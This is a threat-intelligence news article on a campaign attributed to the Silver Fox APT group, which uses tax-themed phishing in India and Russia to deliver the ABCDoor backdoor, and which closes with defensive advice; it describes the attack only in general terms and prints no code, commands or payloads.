Silver Fox ABCDoor Malware Hits India, Russia via Tax Phishing

The China-based advanced persistent threat (APT) group Silver Fox, also tracked as Monarch, SwimSnake, The Great Thief of Valley, UTG-Q-1000, and Void Arachne, has launched a sophisticated campaign deploying the ABCDoor backdoor malware against organizations in India and Russia. The operation, which security researchers began tracking in late 2024, leverages tax-themed phishing emails designed to harvest credentials and compromise enterprise networks across multiple sectors. The group has historically targeted financial institutions, manufacturing companies, and government agencies in Asia-Pacific and Eastern Europe regions, and this latest campaign continues that pattern of economic espionage and data theft.

The ABCDoor malware, a custom backdoor previously associated with the VOID Arachne threat cluster, provides threat actors with persistent remote access to compromised systems. Technical analysis reveals that ABCDoor employs AES-256 encryption to mask command-and-control (C2) communications and utilizes scheduled tasks for persistence on infected Windows hosts. Once executed, the malware establishes connection with attacker-controlled infrastructure and enables comprehensive system surveillance, including keystroke logging, screen capture, and file exfiltration capabilities. Researchers have identified behavioral patterns indicating the malware specifically targets browser credentials, SSH keys, and VPN authentication tokens from victim machines.

The phishing component of this campaign employs fraudulent tax-related documents, including fake GST (Goods and Services Tax) invoices, income tax refund notifications, and fraudulent TDS (Tax Deducted at Source) certificates. The emails originate from domains mimicking legitimate government tax portals such as incometaxindia.gov.in and gosusite.ru, increasing the likelihood of victim engagement. The attack chain involves macro-enabled documents that execute PowerShell scripts to download and install the ABCDoor backdoor. Security researchers have documented specific indicators of compromise (IOCs) including malicious file hashes, suspicious domains, and encoded PowerShell commands observed in affected enterprise environments.

Organizations in India and Russia, particularly those operating in banking, manufacturing, and government sectors, are strongly advised to enhance email security controls and conduct user awareness training focused on phishing detection. Security teams should implement network monitoring for the identified IOCs and consider threat hunting activities to identify potential compromises. This activity exemplifies the ongoing threat posed by China-linked APT groups targeting economic intelligence and intellectual property across multiple geographic regions.